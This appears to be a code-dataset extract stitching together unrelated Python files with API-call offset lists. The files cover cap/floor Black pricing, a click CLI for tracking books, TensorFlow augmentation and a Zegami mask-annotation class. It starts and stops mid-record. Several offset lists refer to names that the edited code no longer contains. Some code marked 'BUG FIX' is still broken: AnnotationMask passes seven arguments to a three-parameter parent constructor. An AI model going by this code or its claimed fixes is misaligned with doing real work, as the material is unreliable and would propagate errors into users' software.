    # five arguments to the four-parameter blacklet (TypeError: duplicate
    # 'omega'); the underlying is the forward rate and vol the total volatility.
    return bond * dcf_factor * blacklet(K, forward, vol, omega=1)
def cap_black(bonds, forwards, times, K, sigma, method='Act360'):
    """Black price of a cap as the sum of its caplets.

    :param bonds: discount factors for each payment date (one per caplet)
    :param forwards: forward rates for each period (one per caplet)
    :param times: schedule [t0, t1, ..., tn]; caplet i covers [times[i], times[i+1]]
    :param K: strike rate
    :param sigma: flat Black volatility
    :param method: day-count convention forwarded to dcf()
    """
    if len(times) == 2:
        return caplet_black(bonds, forwards, times[0], times[1], K, sigma, method=method)
    # BUG FIX: the original popped bonds/forwards (mutating the caller's lists,
    # and in reverse order) and set S = T = bond[i], which indexes a scalar;
    # pair each caplet with its own bond/forward and consecutive schedule times.
    total = 0.0
    for i in range(len(times) - 1):
        total += caplet_black(bonds[i], forwards[i], times[i], times[i + 1], K, sigma, method=method)
    return total
def floorlet_black(bond, forward, S, T, K, sigma, method='Act360'):
    """Black price of a floorlet resetting at S and paying at T.

    Mirrors caplet_black with omega=-1 (a put on the forward rate).
    """
    dcf_factor = dcf(S, T, method=method)
    # total volatility accrued up to the reset date
    vol = sigma * np.sqrt(S)
    # BUG FIX: the original call blacklet(K, S, forward, vol, omega=-1) passed
    # five arguments to the four-parameter blacklet (TypeError); the underlying
    # is the forward rate and vol the total volatility.
    return bond * dcf_factor * blacklet(K, forward, vol, omega=-1)
def floor_black(bonds, forwards, times, K, sigma, method='Act360'):
    """Black price of a floor as the sum of its floorlets.

    :param bonds: discount factors for each payment date (one per floorlet)
    :param forwards: forward rates for each period (one per floorlet)
    :param times: schedule [t0, ..., tn]; floorlet i covers [times[i], times[i+1]]
    :param K: strike rate
    :param sigma: flat Black volatility
    :param method: day-count convention forwarded to dcf()
    """
    if len(times) == 2:
        return floorlet_black(bonds, forwards, times[0], times[1], K, sigma, method=method)
    # BUG FIXES: the original referenced the undefined name `flooret_black`
    # (NameError) and set S = T = bond[i], indexing a scalar popped off the
    # caller's lists; pair each floorlet with its own bond/forward and
    # consecutive schedule times instead.
    total = 0.0
    for i in range(len(times) - 1):
        total += floorlet_black(bonds[i], forwards[i], times[i], times[i + 1], K, sigma, method=method)
    return total
| [
"scipy.stats.norm.cdf",
"dcf.dcf",
"numpy.log",
"numpy.sqrt"
] | [((128, 141), 'numpy.log', 'np.log', (['(F / K)'], {}), '(F / K)\n', (134, 141), True, 'import numpy as np\n'), ((405, 429), 'dcf.dcf', 'dcf', (['S', 'T'], {'method': 'method'}), '(S, T, method=method)\n', (408, 429), False, 'from dcf import dcf\n'), ((1097, 1121), 'dcf.dcf', 'dcf', (['S', 'T'], {'method': 'method'}), '(S, T, method=method)\n', (1100, 1121), False, 'from dcf import dcf\n'), ((451, 461), 'numpy.sqrt', 'np.sqrt', (['S'], {}), '(S)\n', (458, 461), True, 'import numpy as np\n'), ((1143, 1153), 'numpy.sqrt', 'np.sqrt', (['S'], {}), '(S)\n', (1150, 1153), True, 'import numpy as np\n'), ((258, 278), 'scipy.stats.norm.cdf', 'norm.cdf', (['(omega * d1)'], {}), '(omega * d1)\n', (266, 278), False, 'from scipy.stats import norm\n'), ((293, 313), 'scipy.stats.norm.cdf', 'norm.cdf', (['(omega * d2)'], {}), '(omega * d2)\n', (301, 313), False, 'from scipy.stats import norm\n')] |
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 12 13:00:50 2017
@author: Charlie
Program for storing and plotting information about reading habits: "bookworm"
IMPORTANT!! CLASS AND SUBFUNCTIONS SHOULD JUST DO PYTHON STUFF.
FUNCTIONS BELOW THE CLASS THAT CALL THE CLASS FNS ARE FOR PLAYING WITH CLICK
"""
import click #for command line interface
import pickle
import matplotlib.pyplot as plt
import numpy as np
import csv
@click.command()
@click.argument('filename')
def start_new_booklist(filename):
    """Create a new, empty pickled book list named <filename>.pkl."""
    book_list = []  # empty list
    with open(filename + '.pkl', 'wb') as f:
        pickle.dump(book_list, f, pickle.HIGHEST_PROTOCOL)
    # mirror the list into a plain-text file when it has content
    if len(book_list) > 0:
        with open(filename + '.txt', 'w') as txtfile:
            for item in book_list:
                # BUG FIX: was the Python 2 statement `print>>txtfile, item`,
                # which raises TypeError under Python 3
                print(item, file=txtfile)
@click.command()
@click.argument('filename')
@click.option('--method', type=click.Choice(['stdin', 'file']))
def add_new_book(filename, method):
    """Prompt for a new book's details and prepend them to <filename>.pkl.

    --method stdin asks for every field on the command line; --method file
    opens a template in an editor and parses the edited result.
    """
    # BUG FIX: the original did filename.encode('ascii', 'ignore'), which on
    # Python 3 yields bytes and makes `filename + '.pkl'` raise TypeError.
    if method == 'stdin':
        with open(filename + '.pkl', 'rb+') as f:
            book_list = pickle.load(f)
        title = click.prompt('Enter the book title', type = str)
        title_list = title.split()
        search_string = ''
        for word in title_list:
            search_string += word
            search_string += '+'
        # open a Goodreads search for the title to help fill in details
        click.launch('https://www.goodreads.com/search?q=' + search_string)
        author_last = click.prompt('Enter the author\'s LAST name', type = str)
        author_first = click.prompt('Enter the author\'s FIRST name', type = str)
        author_gender = click.prompt('Enter the author\'s gender (M/F/n)', type = str)
        author_race = click.prompt('Enter the author\'s race', type = str)
        author_nationality = click.prompt('Enter the author\'s nationality', type = str)
        publication_year = click.prompt('Enter the publication year', type = int)
        genre = click.prompt('Enter the book genre', type = str)
        rating = click.prompt('Enter your rating (1-10)', type = int)
        # insert info provided above into a dictionary held in the book list
        book_list.insert(0, {'Title': title,
                             'Author last name': author_last,
                             'Author first name': author_first,
                             'Author gender': author_gender,
                             'Author race': author_race,
                             'Author nationality': author_nationality,
                             'Publication year': publication_year,
                             'Genre': genre,
                             'Rating': rating})
    elif method == 'file':
        title = click.prompt('Enter the book title', type = str)
        title_list = title.split()
        search_string = ''
        for word in title_list:
            search_string += word
            search_string += '+'
        click.launch('https://www.goodreads.com/search?q=' + search_string)
        with open(filename + '.pkl', 'rb+') as f:
            book_list = pickle.load(f)
        temp_dict = {'Title:': title,
                     'Author last name:': [],
                     'Author first name:': [],
                     'Author gender:': [],
                     'Author race:': [],
                     'Author nationality:': [],
                     'Publication year:': [],
                     'Genre:': [],
                     'Rating:': []}
        # write the editable template (fix: use `with` instead of an unclosed file)
        with open('temp_book.txt', 'w+') as f:
            for key in temp_dict:
                if key == 'Title:':
                    f.write(key + ' ' + title + '\n')
                else:
                    f.write(key + '\n')
        # bring up the template for the user to edit
        click.edit(filename='temp_book.txt')
        # now read the file and parse into the book entry dictionary
        input_dict = {}
        with open('temp_book.txt') as f:
            for line in f:
                # BUG FIX: split on the FIRST colon only, so values that
                # contain ':' don't raise "too many values to unpack"
                (key, val) = line.split(':', 1)
                input_dict[key] = val
        book_list.insert(0, input_dict)
    with open(filename + '.pkl', 'wb') as f:
        pickle.dump(book_list, f, pickle.HIGHEST_PROTOCOL)
    if len(book_list) > 0:
        with open(filename + '.txt', 'w') as txtfile:
            for item in book_list:
                # BUG FIX: was the Python 2 statement `print>>txtfile, item`
                print(item, file=txtfile)
@click.command()
@click.argument('filename')
@click.option('--plot_style', default='pie')  # options: 'pie' and 'hist'
def plot_author_gender(filename, plot_style):
    """Plot the distribution of author genders in the book list and save it
    to piechart.png."""
    with open(filename + '.pkl', 'rb') as f:
        book_list = pickle.load(f)
    men = 0.
    women = 0.
    other = 0.
    for book in book_list:
        # BUG FIX: the original called .encode('ascii', 'ignore'), which on
        # Python 3 yields bytes that never compare equal to 'M'/'F'/'n',
        # leaving every count at zero.
        gender = book['Author gender']
        if gender == 'M':
            men += 1
        elif gender == 'F':
            women += 1
        elif gender == 'n':
            other += 1
    counts = np.array([men, women, other])
    labels = 'Men', 'Women', 'Other'
    fig, ax = plt.subplots()
    # NOTE(review): only the 'pie' style is implemented; any other value
    # falls through and saves an empty figure — confirm intended behavior.
    if plot_style == 'pie':
        ax.pie(counts, labels=labels)
        ax.axis('equal')
    fig.savefig('piechart.png')
@click.command()
@click.argument('filename')
def export_to_csv(filename):
    """Export the pickled book list to <filename>.csv, one row per book."""
    with open(filename + '.pkl', 'rb') as f:
        book_list = pickle.load(f)
    # guard against an empty list (book_list[0] would raise IndexError)
    if not book_list:
        return
    keys = book_list[0].keys()
    # BUG FIX: csv on Python 3 requires a text-mode file ('wb' raises
    # TypeError); newline='' prevents blank rows on Windows.
    with open(filename + '.csv', 'w', newline='') as output_file:
        dict_writer = csv.DictWriter(output_file, keys)
        dict_writer.writeheader()
        dict_writer.writerows(book_list)
#==============================================================================
# import pickle #for saving sictionary
#
# class Bookworm(object):
# def __init__(self):
# "Initialize Bookworm"
# pass
#
# def start_new_booklist(self):
# "Begin a new list of books"
# #instantiate book list (a list of dictionaries)
# #try to find saved dictionary
# #otherwise, make a new one:
# self.book_list = []
#
# def open_existing_booklist(self, name_to_open):
# "Open an existing list of books"
# with open(name_to_open + '_books.pkl', 'rb') as f:
# self.book_list = pickle.load(f)
#
# def add_new_book(self):
# "Get and save info for a new book"
# title = click.prompt('Enter the book title:', type = str)
# author_last = click.prompt('Enter the author\'s LAST name:', type = str)
# author_first = click.prompt('Enter the author\'s FIRST name:', type = str)
# author_gender = click.prompt('Enter the author\'s gender (M/F/n):', type = str)
# author_race = click.prompt('Enter the author\'s race:', type = str)
# author_nationality = click.prompt('Enter the author\'s nationality:', type = str)
# publication_year = click.prompt('Enter the publication year:', type = str)
# genre = click.prompt('Enter the book genre:', type = str)
# rating = click.prompt('Enter your rating (1-10):', type = int)
#
# #insert info provided above into a dictionary held in the book list
# self.book_list.insert(0, {'Title': title,
# 'Author last name': author_last,
# 'Author first name': author_first,
# 'Author gender': author_gender,
# 'Author race': author_race,
# 'Author nationality': author_nationality,
# 'Publication year': publication_year,
# 'Genre': genre,
# 'Rating': rating})
# # def make_template_input_file(self):
# # "Make template text file with parameters blank"
# #
# # def open_template_file_in_editor(self):
# # "Open the text file in an editor to get user input"
#
# # def export_info_to_csv(self):
# # "Export all attributes to a csv file"
#
# # def make_pie_chart_author_gender(self):
# # "Make a pie chart of author gender"
#
# def save_book_dictionary(self,book_list_name, save_as_name):
# "Save the dictionary, overwriting the old one, for reopening next time"
# with open(save_as_name + '_books.pkl', 'wb') as f:
#==============================================================================
# pickle.dump(book_list_name, f, pickle.HIGHEST_PROTOCOL)
| [
"pickle.dump",
"click.edit",
"click.argument",
"click.option",
"click.launch",
"click.command",
"click.Choice",
"pickle.load",
"numpy.array",
"csv.DictWriter",
"matplotlib.pyplot.subplots",
"click.prompt"
] | [((428, 443), 'click.command', 'click.command', ([], {}), '()\n', (441, 443), False, 'import click\n'), ((445, 471), 'click.argument', 'click.argument', (['"""filename"""'], {}), "('filename')\n", (459, 471), False, 'import click\n'), ((804, 819), 'click.command', 'click.command', ([], {}), '()\n', (817, 819), False, 'import click\n'), ((821, 847), 'click.argument', 'click.argument', (['"""filename"""'], {}), "('filename')\n", (835, 847), False, 'import click\n'), ((4379, 4394), 'click.command', 'click.command', ([], {}), '()\n', (4392, 4394), False, 'import click\n'), ((4396, 4422), 'click.argument', 'click.argument', (['"""filename"""'], {}), "('filename')\n", (4410, 4422), False, 'import click\n'), ((4424, 4467), 'click.option', 'click.option', (['"""--plot_style"""'], {'default': '"""pie"""'}), "('--plot_style', default='pie')\n", (4436, 4467), False, 'import click\n'), ((5202, 5217), 'click.command', 'click.command', ([], {}), '()\n', (5215, 5217), False, 'import click\n'), ((5219, 5245), 'click.argument', 'click.argument', (['"""filename"""'], {}), "('filename')\n", (5233, 5245), False, 'import click\n'), ((4969, 4998), 'numpy.array', 'np.array', (['[men, women, other]'], {}), '([men, women, other])\n', (4977, 4998), True, 'import numpy as np\n'), ((5050, 5064), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (5062, 5064), True, 'import matplotlib.pyplot as plt\n'), ((590, 640), 'pickle.dump', 'pickle.dump', (['book_list', 'f', 'pickle.HIGHEST_PROTOCOL'], {}), '(book_list, f, pickle.HIGHEST_PROTOCOL)\n', (601, 640), False, 'import pickle\n'), ((1167, 1213), 'click.prompt', 'click.prompt', (['"""Enter the book title"""'], {'type': 'str'}), "('Enter the book title', type=str)\n", (1179, 1213), False, 'import click\n'), ((1385, 1452), 'click.launch', 'click.launch', (["('https://www.goodreads.com/search?q=' + search_string)"], {}), "('https://www.goodreads.com/search?q=' + search_string)\n", (1397, 1452), False, 'import click\n'), ((1475, 
1529), 'click.prompt', 'click.prompt', (['"""Enter the author\'s LAST name"""'], {'type': 'str'}), '("Enter the author\'s LAST name", type=str)\n', (1487, 1529), False, 'import click\n'), ((1556, 1611), 'click.prompt', 'click.prompt', (['"""Enter the author\'s FIRST name"""'], {'type': 'str'}), '("Enter the author\'s FIRST name", type=str)\n', (1568, 1611), False, 'import click\n'), ((1639, 1698), 'click.prompt', 'click.prompt', (['"""Enter the author\'s gender (M/F/n)"""'], {'type': 'str'}), '("Enter the author\'s gender (M/F/n)", type=str)\n', (1651, 1698), False, 'import click\n'), ((1724, 1773), 'click.prompt', 'click.prompt', (['"""Enter the author\'s race"""'], {'type': 'str'}), '("Enter the author\'s race", type=str)\n', (1736, 1773), False, 'import click\n'), ((1806, 1862), 'click.prompt', 'click.prompt', (['"""Enter the author\'s nationality"""'], {'type': 'str'}), '("Enter the author\'s nationality", type=str)\n', (1818, 1862), False, 'import click\n'), ((1893, 1945), 'click.prompt', 'click.prompt', (['"""Enter the publication year"""'], {'type': 'int'}), "('Enter the publication year', type=int)\n", (1905, 1945), False, 'import click\n'), ((1964, 2010), 'click.prompt', 'click.prompt', (['"""Enter the book genre"""'], {'type': 'str'}), "('Enter the book genre', type=str)\n", (1976, 2010), False, 'import click\n'), ((2030, 2080), 'click.prompt', 'click.prompt', (['"""Enter your rating (1-10)"""'], {'type': 'int'}), "('Enter your rating (1-10)', type=int)\n", (2042, 2080), False, 'import click\n'), ((4157, 4207), 'pickle.dump', 'pickle.dump', (['book_list', 'f', 'pickle.HIGHEST_PROTOCOL'], {}), '(book_list, f, pickle.HIGHEST_PROTOCOL)\n', (4168, 4207), False, 'import pickle\n'), ((879, 910), 'click.Choice', 'click.Choice', (["['stdin', 'file']"], {}), "(['stdin', 'file'])\n", (891, 910), False, 'import click\n'), ((4606, 4620), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (4617, 4620), False, 'import pickle\n'), ((5340, 5354), 'pickle.load', 
'pickle.load', (['f'], {}), '(f)\n', (5351, 5354), False, 'import pickle\n'), ((5463, 5496), 'csv.DictWriter', 'csv.DictWriter', (['output_file', 'keys'], {}), '(output_file, keys)\n', (5477, 5496), False, 'import csv\n'), ((1136, 1150), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1147, 1150), False, 'import pickle\n'), ((2727, 2773), 'click.prompt', 'click.prompt', (['"""Enter the book title"""'], {'type': 'str'}), "('Enter the book title', type=str)\n", (2739, 2773), False, 'import click\n'), ((2945, 3012), 'click.launch', 'click.launch', (["('https://www.goodreads.com/search?q=' + search_string)"], {}), "('https://www.goodreads.com/search?q=' + search_string)\n", (2957, 3012), False, 'import click\n'), ((3767, 3803), 'click.edit', 'click.edit', ([], {'filename': '"""temp_book.txt"""'}), "(filename='temp_book.txt')\n", (3777, 3803), False, 'import click\n'), ((3087, 3101), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (3098, 3101), False, 'import pickle\n')] |
import tensorflow as tf
import numpy as np
import cv2
import random
# Metodos para Data Augmentation siguiendo el Dataset API
# de tensorflow, donde
# x, y in dataset:
# x: tensor con la imagen de shape [w, h, 3]
# y: tenosr con one_hot encoding de las classes
# Realiza un flip aleatorio a la image
def random_flip(x, y):
    """Randomly mirror the image horizontally and vertically; the label
    tensor passes through unchanged."""
    flipped = tf.image.random_flip_left_right(x)
    flipped = tf.image.random_flip_up_down(flipped)
    return flipped, y
# Aplica augmentacion al color de las imagenes
def color_aug(x, y):
    """Apply random hue/saturation/brightness/contrast jitter to the image;
    the label tensor passes through unchanged."""
    jittered = tf.image.random_hue(x, 0.08)
    jittered = tf.image.random_saturation(jittered, 0.6, 1.6)
    jittered = tf.image.random_brightness(jittered, 0.05)
    jittered = tf.image.random_contrast(jittered, 0.7, 1.3)
    return jittered, y
def expand_image(x, y):
    """Paste the image at a random offset inside a larger (up to 2x) canvas
    filled with the image mean; the label tensor passes through unchanged."""
    src = np.array(x)
    height, width, depth = src.shape
    scale = random.uniform(1, 2)
    left = random.uniform(0, width * scale - width)
    top = random.uniform(0, height * scale - height)
    canvas = np.zeros((int(height * scale), int(width * scale), depth),
                      dtype=src.dtype)
    # fill the background with the mean pixel value of the source image
    canvas[:, :, :] = np.mean(src)
    canvas[int(top):int(top + height), int(left):int(left + width)] = src
    return tf.convert_to_tensor(canvas), y
# Aplica una expansion a la image
class ImageExpand():
    """Data-augmentation helper that embeds an image into a randomly larger
    canvas (up to self.ratio times the original size)."""

    def __init__(self, ratio, fill_type="w"):
        self.ratio = ratio
        self.fill_type = fill_type

    def expand_image(self, x, y):
        """Paste the image at a random offset inside a mean-filled canvas."""
        src = np.array(x)
        height, width, depth = src.shape
        scale = random.uniform(1, self.ratio)
        left = random.uniform(0, width * scale - width)
        top = random.uniform(0, height * scale - height)
        canvas = np.zeros((int(height * scale), int(width * scale), depth),
                          dtype=src.dtype)
        # fill the background with the mean pixel value of the source image
        canvas[:, :, :] = np.mean(src)
        canvas[int(top):int(top + height), int(left):int(left + width)] = src
        return tf.convert_to_tensor(canvas), y
| [
"random.uniform",
"tensorflow.image.random_flip_up_down",
"tensorflow.image.random_contrast",
"tensorflow.convert_to_tensor",
"tensorflow.image.random_hue",
"tensorflow.image.random_flip_left_right",
"numpy.mean",
"numpy.array",
"tensorflow.image.random_saturation",
"tensorflow.image.random_bright... | [((337, 371), 'tensorflow.image.random_flip_left_right', 'tf.image.random_flip_left_right', (['x'], {}), '(x)\n', (368, 371), True, 'import tensorflow as tf\n'), ((380, 411), 'tensorflow.image.random_flip_up_down', 'tf.image.random_flip_up_down', (['x'], {}), '(x)\n', (408, 411), True, 'import tensorflow as tf\n'), ((506, 534), 'tensorflow.image.random_hue', 'tf.image.random_hue', (['x', '(0.08)'], {}), '(x, 0.08)\n', (525, 534), True, 'import tensorflow as tf\n'), ((543, 582), 'tensorflow.image.random_saturation', 'tf.image.random_saturation', (['x', '(0.6)', '(1.6)'], {}), '(x, 0.6, 1.6)\n', (569, 582), True, 'import tensorflow as tf\n'), ((591, 626), 'tensorflow.image.random_brightness', 'tf.image.random_brightness', (['x', '(0.05)'], {}), '(x, 0.05)\n', (617, 626), True, 'import tensorflow as tf\n'), ((635, 672), 'tensorflow.image.random_contrast', 'tf.image.random_contrast', (['x', '(0.7)', '(1.3)'], {}), '(x, 0.7, 1.3)\n', (659, 672), True, 'import tensorflow as tf\n'), ((727, 738), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (735, 738), True, 'import numpy as np\n'), ((792, 812), 'random.uniform', 'random.uniform', (['(1)', '(2)'], {}), '(1, 2)\n', (806, 812), False, 'import random\n'), ((825, 865), 'random.uniform', 'random.uniform', (['(0)', '(width * ratio - width)'], {}), '(0, width * ratio - width)\n', (839, 865), False, 'import random\n'), ((874, 916), 'random.uniform', 'random.uniform', (['(0)', '(height * ratio - height)'], {}), '(0, height * ratio - height)\n', (888, 916), False, 'import random\n'), ((1045, 1059), 'numpy.mean', 'np.mean', (['image'], {}), '(image)\n', (1052, 1059), True, 'import numpy as np\n'), ((1150, 1184), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['expand_image'], {}), '(expand_image)\n', (1170, 1184), True, 'import tensorflow as tf\n'), ((1421, 1432), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (1429, 1432), True, 'import numpy as np\n'), ((1494, 1523), 
'random.uniform', 'random.uniform', (['(1)', 'self.ratio'], {}), '(1, self.ratio)\n', (1508, 1523), False, 'import random\n'), ((1540, 1580), 'random.uniform', 'random.uniform', (['(0)', '(width * ratio - width)'], {}), '(0, width * ratio - width)\n', (1554, 1580), False, 'import random\n'), ((1593, 1635), 'random.uniform', 'random.uniform', (['(0)', '(height * ratio - height)'], {}), '(0, height * ratio - height)\n', (1607, 1635), False, 'import random\n'), ((1776, 1790), 'numpy.mean', 'np.mean', (['image'], {}), '(image)\n', (1783, 1790), True, 'import numpy as np\n'), ((1918, 1945), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['image'], {}), '(image)\n', (1938, 1945), True, 'import tensorflow as tf\n')] |
# -*- coding: utf-8 -*-
# Copyright 2021 Zegami Ltd
"""Annotation functionality."""
import base64
import io
import os
import numpy as np
from PIL import Image
class _Annotation():
    """Base (abstract) class for annotations.

    Subclasses must define the string class attribute TYPE; instantiating
    this base class directly raises TypeError.
    """

    # Define the string annotation TYPE in child classes
    TYPE = None
    UPLOADABLE_DESCRIPTION = None

    def __init__(self, collection, annotation_data, source=None):
        """
        !! STOP !! Instantiate a non-hidden subclass instead.

        Each subclass should call this __init__ AFTER assignment of members
        so that checks can be performed.

        If making a new annotation to upload, use collection.upload_annotation
        instead.
        """
        self._collection = collection  # Collection instance
        self._source = source  # Source instance
        self._data = annotation_data  # { imageset_id, image_index, type, annotation }

        # Enforce abstract requirement
        if self.TYPE is None:
            raise TypeError(
                'Do not instantiate the base _Annotation class. It is '
                'intended to be an abstract class, try one of the non-hidden '
                'Annotation classes instead.')

    @property
    def collection(self):
        """The collection this annotation belongs to."""
        return self._collection

    @property
    def source(self):
        """The source this annotation belongs to in its collection."""
        return self._source

    @property
    def _image_index(self):
        """The image-space index of this annotation's owner's image."""
        if 'image_index' not in self._data.keys():
            raise ValueError('Annotation\'s _data did not contain '
                             '\'image_index\': {}'.format(self._data))
        return self._data['image_index']

    @property
    def row_index(self):
        """The data-row-space index of this annotation's owner."""
        lookup = self.collection._get_image_meta_lookup(self.source)
        return lookup.index(self._image_index)

    @property
    def _imageset_id(self):
        """Shortcut for the owning collection's (source's) imageset ID."""
        return self.collection._get_imageset_id(self.source)

    # -- Abstract/virtual, must be implemented in children --

    @classmethod
    def create_uploadable(cls) -> None:
        """Extend in children to include actual annotation data."""
        return {
            'type': cls.TYPE,
            'format': None,
            'annotation': None
        }

    def view(self):
        """Abstract method to view a representation of the annotation."""
        return NotImplementedError(
            '\'view\' method not implemented for annotation type: {}'
            .format(self.TYPE))
class AnnotationMask(_Annotation):
    """An annotation comprising a bitmask and some metadata.
    To view the masks an image, use mask.view().
    Note: Providing imageset_id and image_index is not mandatory and can be
    obtained automatically, but this is slow and can cause unnecessary
    re-downloading of data."""
    TYPE = 'mask'
    UPLOADABLE_DESCRIPTION = """
        'Mask annotation data includes the actual mask (as a base64 encoded
        'png string), a width and height, bounding box, and score if generated
        by a model (else None). """
    def __init__(self, collection, row_index, source=None, from_filepath=None,
                 from_url=None, imageset_id=None, image_index=None):
        # Bug fix: 'self' was previously passed explicitly in addition to the
        # implicit binding (super().__init__(self, collection, ...)), which
        # shifted every argument one position to the right in the parent.
        super().__init__(collection, row_index, source, from_filepath,
                         from_url, imageset_id, image_index)
    @classmethod
    def create_uploadable(cls, bool_mask, class_id):
        """Creates a data package ready to be uploaded with a collection's
        .upload_annotation().

        Args:
            bool_mask: 2D boolean numpy array of shape (height, width).
            class_id: integer class label stored alongside the mask.

        Raises:
            TypeError: if bool_mask is not a bool numpy array.
            ValueError: if bool_mask is not 2-dimensional.

        Note: The output of this is NOT an annotation, it is used to upload
        annotation data to Zegami, which when retrieved will form an
        annotation. """
        if type(bool_mask) != np.ndarray:
            raise TypeError('Expected bool_mask to be a numpy array, not a {}'
                            .format(type(bool_mask)))
        if bool_mask.dtype != bool:
            raise TypeError('Expected bool_mask.dtype to be bool, not {}'
                            .format(bool_mask.dtype))
        if len(bool_mask.shape) != 2:
            raise ValueError('Expected bool_mask to have a shape of 2 '
                             '(height, width), not {}'.format(bool_mask.shape))
        h, w = bool_mask.shape
        # Encode the mask array as a 1 bit PNG encoded as base64
        mask_image = Image.fromarray(bool_mask.astype('uint8') * 255).convert('1')
        mask_buffer = io.BytesIO()
        mask_image.save(mask_buffer, format='PNG')
        byte_data = mask_buffer.getvalue()
        mask_b64 = base64.b64encode(byte_data)
        mask_string = "data:image/png;base64,{}".format(mask_b64.decode("utf-8"))
        # Bounding box of the set pixels, in pixel coordinates.
        bounds = cls.get_bool_mask_bounds(bool_mask)
        roi = {
            'xmin': int(bounds['left']),
            'xmax': int(bounds['right']),
            'ymin': int(bounds['top']),
            'ymax': int(bounds['bottom']),
            'width': int(bounds['right'] - bounds['left']),
            'height': int(bounds['bottom'] - bounds['top'])
        }
        data = {
            'mask': mask_string,
            'width': int(w),
            'height': int(h),
            'score': None,
            'roi': roi
        }
        uploadable = super().create_uploadable()
        uploadable['format'] = '1UC1'
        uploadable['annotation'] = data
        uploadable['class_id'] = int(class_id)
        return uploadable
    def view(self):
        """View the mask as an image. """
        # NOT TESTED
        im = Image.fromarray(self.mask_uint8)
        im.show()
    @property
    def mask_uint8():
        pass
    @mask_uint8.getter
    def mask_uint8(self):
        """Mask data as a uint8 numpy array (0 -> 255). """
        return self.mask_bool.astype(np.uint8) * 255
    @property
    def mask_bool():
        pass
    @mask_bool.getter
    def mask_bool(self):
        """Mask data as a bool numpy array.

        Raises:
            ValueError: if the decoded mask is not 2-dimensional.
            TypeError: if the decoded mask is not of bool dtype.
        """
        # _get_bool_arr is provided elsewhere (presumably the parent class).
        a = self._get_bool_arr()
        if len(a.shape) != 2:
            raise ValueError('Unexpected mask_bool shape: {}'.format(a.shape))
        if a.dtype != bool:
            raise TypeError('Unexpected mask_bool dtype: {}'.format(a.dtype))
        return a
    @staticmethod
    def _read_bool_arr(local_fp):
        """Reads the boolean array from a locally stored file. Useful for
        creation of an upload package. """
        # TODO - Not finished/tested
        assert os.path.exists(local_fp), 'File not found: {}'.format(local_fp)
        assert os.path.isfile(local_fp), 'Path is not a file: {}'.format(local_fp)
        arr = np.array(Image.open(local_fp), dtype='uint8')
        return arr
    @staticmethod
    def parse_bool_masks(bool_masks):
        """Checks the masks for correct data types, and ensures a shape of
        [h, w, N].

        Raises:
            TypeError: if bool_masks is not a bool numpy array.
        """
        if type(bool_masks) != np.ndarray:
            raise TypeError('Expected bool_masks to be a numpy array, not {}'
                            .format(type(bool_masks)))
        if bool_masks.dtype != bool:
            raise TypeError('Expected bool_masks to have dtype == bool, not {}'
                            .format(bool_masks.dtype))
        # If there is only one mask with no third shape value, insert one
        if len(bool_masks.shape) == 2:
            bool_masks = np.expand_dims(bool_masks, -1)
        return bool_masks
    @classmethod
    def get_bool_mask_bounds(cls, bool_mask):
        """Returns the { top, bottom, left, right } of the boolean array
        associated with this annotation, calculated from its array data.

        An all-False mask yields all-zero bounds (np.where finds no rows
        or columns, and the IndexError is caught below).
        """
        bool_mask = cls.parse_bool_masks(bool_mask)[:, :, 0]
        rows = np.any(bool_mask, axis=1)
        cols = np.any(bool_mask, axis=0)
        try:
            top, bottom = np.where(rows)[0][[0, -1]]
            left, right = np.where(cols)[0][[0, -1]]
        except Exception:
            top, bottom, left, right = 0, 0, 0, 0
        return {'top': top, 'bottom': bottom, 'left': left, 'right': right}
    @staticmethod
    def base64_to_boolmask(b64_data):
        """Converts str base64 annotation data from Zegami into a boolean
        mask.

        Raises:
            TypeError: if b64_data is not a str.
        """
        if type(b64_data) is not str:
            raise TypeError('b64_data should be a str, not {}'.format(type(b64_data)))
        # Strip an optional 'data:image/png;base64,' style prefix.
        if b64_data.startswith('data:'):
            b64_data = b64_data.split(',', 1)[-1]
        img = Image.open(io.BytesIO(base64.b64decode(b64_data)))
        img_arr = np.array(img)
        premax = img_arr.max()
        # Rescale 0/1-valued images to 0/255 before thresholding at 125.
        arr_int = np.array(np.array(img) * 255 if premax < 2 else np.array(img), dtype='uint8')
        return arr_int > 125
| [
"io.BytesIO",
"os.path.exists",
"numpy.expand_dims",
"base64.b64decode",
"PIL.Image.open",
"numpy.any",
"os.path.isfile",
"numpy.where",
"base64.b64encode",
"numpy.array",
"PIL.Image.fromarray"
] | [((4971, 4983), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (4981, 4983), False, 'import io\n'), ((5097, 5124), 'base64.b64encode', 'base64.b64encode', (['byte_data'], {}), '(byte_data)\n', (5113, 5124), False, 'import base64\n'), ((6042, 6074), 'PIL.Image.fromarray', 'Image.fromarray', (['self.mask_uint8'], {}), '(self.mask_uint8)\n', (6057, 6074), False, 'from PIL import Image\n'), ((6941, 6965), 'os.path.exists', 'os.path.exists', (['local_fp'], {}), '(local_fp)\n', (6955, 6965), False, 'import os\n'), ((7020, 7044), 'os.path.isfile', 'os.path.isfile', (['local_fp'], {}), '(local_fp)\n', (7034, 7044), False, 'import os\n'), ((8160, 8185), 'numpy.any', 'np.any', (['bool_mask'], {'axis': '(1)'}), '(bool_mask, axis=1)\n', (8166, 8185), True, 'import numpy as np\n'), ((8201, 8226), 'numpy.any', 'np.any', (['bool_mask'], {'axis': '(0)'}), '(bool_mask, axis=0)\n', (8207, 8226), True, 'import numpy as np\n'), ((8949, 8962), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (8957, 8962), True, 'import numpy as np\n'), ((7111, 7131), 'PIL.Image.open', 'Image.open', (['local_fp'], {}), '(local_fp)\n', (7121, 7131), False, 'from PIL import Image\n'), ((7810, 7840), 'numpy.expand_dims', 'np.expand_dims', (['bool_masks', '(-1)'], {}), '(bool_masks, -1)\n', (7824, 7840), True, 'import numpy as np\n'), ((8902, 8928), 'base64.b64decode', 'base64.b64decode', (['b64_data'], {}), '(b64_data)\n', (8918, 8928), False, 'import base64\n'), ((9060, 9073), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (9068, 9073), True, 'import numpy as np\n'), ((8267, 